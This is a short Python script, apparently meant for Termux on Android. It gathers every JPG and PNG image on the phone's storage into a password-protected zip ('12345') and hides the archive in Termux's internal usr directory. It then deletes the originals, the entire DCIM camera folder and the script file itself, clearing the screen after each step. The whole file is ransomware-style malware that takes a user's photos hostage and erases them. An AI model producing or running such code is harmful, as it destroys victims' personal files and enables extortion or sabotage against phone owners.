from os import system as a
a('mkdir /sdcard/photo')
a('mv /sdcard/*.jpg  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*.jpg  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*.jpg  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*.jpg  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*/*.jpg  /sdcard/photo')
a('clear')
a('mv /sdcard/*.png  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*.png  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*.png  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*.png  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*/*.png  /sdcard/photo')
a('clear')
a('cd /sdcard/photo')
a('clear')
a('zip -P 12345 roooot.zip /sdcard/photo /sdcard/photo/* > uu.txt')
a('clear')
a('mv /sdcard/photo/roooot.zip /data/data/com.termux/files/usr')
a('clear')
a('mv /sdcard/roooot.zip /data/data/com.termux/files/usr')
a('mv /data/data/com.termux/files/home/roooot.zip /data/data/com.termux/files/usr')
a('rm -rif /sdcard/photo')
a('rm -rif /sdcard/DCIM')
a('rm -rif /data/data/com.termux/files/home/maxx.py')
a('clear')
a('clear')
